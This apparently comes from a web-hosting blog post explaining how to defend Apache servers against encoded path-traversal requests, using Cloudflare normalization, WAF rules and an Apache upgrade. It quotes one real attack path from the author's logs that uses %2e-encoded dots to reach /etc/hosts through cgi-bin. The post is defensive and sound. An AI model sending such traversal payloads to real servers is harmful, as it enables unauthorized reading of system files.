How to Protect Yourself From Network Traversal Attacks

The other day when looking at my ConfigServer Security logs, I saw the following line:

I’ve been getting a few of these recently. Attempts to access paths on my server that look like this:

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts

It looks strange, because these are encoded characters. “%2e” stands for dot (.). So the path above is actually trying to access:

/cgi-bin/../../../../../../../etc/hosts

This is called a “Network Traversal Attack” and is an attempt to exploit a vulnerability on Apache servers. Here’s how to protect yourself from it.

Method 1: Use Cloudflare URL Normalization

If you’re using Cloudflare’s DNS servers to proxy your traffic, you can turn on the option in the “Page Rules” section and enable the “Normalize incoming URLs” option as shown here:

This Cloudflare rule “normalizes” URLs before passing them on to the page rules, the firewall rules, and the WAF. It’s an important option because you don’t want attackers to circumvent your carefully crafted rules by using tricks like encoding the URL. The second option normalizes URLs to the origin and does the same when the request is sent directly to the server. In fact, it’s arguably more important because the consequences of your server being compromised are so much more severe.

Method 2: Enable the Cloudflare WAF Rules to Block URLs like This

This method is only available for “Pro” Cloudflare users. I’ve talked about the benefits of the Cloudflare Pro plan before, here on the NameHero blog, and I use it myself on my site WP-Tweaks.com to save my web hosting from resource-sucking requests.

For Pro Cloudflare users, you can enable the following two WAF rules:

100045 and 100045A

You can search for these rules in the “Managed Firewall” section like this:

If you’re worried about blocking legitimate users, just set the Mode to “Challenge” instead of Block. Every bot I’ve seen so far has failed the JS “Challenge” that Cloudflare poses, and it delays legitimate users by just a few seconds. I don’t see why a real user would be using this kind of URL, but even if they do, it’s not going to pose a problem to them.

Method 3: Update Apache to Version 2.4.51

The methods above will only protect you if attackers craft the URL and it proxies through Cloudflare. This means they’re using one of your domain names registered with Cloudflare. But what if they try and access your IP directly? Cloudflare can’t protect you against that. In fact, in the first screenshot that I showed, the URL hit my server without going through Cloudflare, since I’m already protected against that kind of thing.

The only solution for this is to update Apache to version 2.4.51 if you haven’t already done so. The newer versions of Apache have the “require all denied” configuration, that prevents these kinds of attacks. Before this, attackers could get access to files outside the document root and enter into locations in which they had no business being.

While Method 1 and 2 are optional, Method 3 is pretty much mandatory regardless of any other protections you have. Cloudflare can only protect you against a certain kind of attack, and you can’t afford to have a vulnerable server because malicious stuff will get through. Such is the responsibility that comes with having your own VPS or dedicated server!